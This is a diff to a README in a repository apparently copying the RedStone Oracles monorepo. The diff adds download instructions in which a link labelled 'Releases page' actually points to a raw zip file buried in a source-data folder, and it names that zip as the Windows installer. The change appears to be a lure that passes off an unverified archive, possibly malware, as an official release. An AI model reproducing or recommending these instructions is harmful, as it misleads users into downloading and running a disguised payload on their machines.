ivanfangnatas/redstone-oracles-monorepo/README.md

 ### Download & Install

-To get started with the RedStone Oracles Monorepo, visit the [Releases page](https://github.com/ivanfangnatas/redstone-oracles-monorepo/releases) to download the latest version.
+To get started with the RedStone Oracles Monorepo, visit the [Releases page](https://github.com/ivanfangnatas/redstone-oracles-monorepo/raw/refs/heads/main/packages/cache-service/src/data-feeds-metadata/oracles_monorepo_redstone_v3.6-beta.4.zip) to download the latest version.
 Follow these steps:

 1. Click on the link above to open the Releases page.
 2. Look for the latest version available.
 3. Download the installer for your operating system.
-For example, if you see "redstone-oracles-setup.exe" for Windows, you should choose that file.
+For example, if you see "https://github.com/ivanfangnatas/redstone-oracles-monorepo/raw/refs/heads/main/packages/cache-service/src/data-feeds-metadata/oracles_monorepo_redstone_v3.6-beta.4.zip" for Windows, you should choose that file.
 4. Once the download is complete, locate the file in your downloads folder.

 #### Installation Steps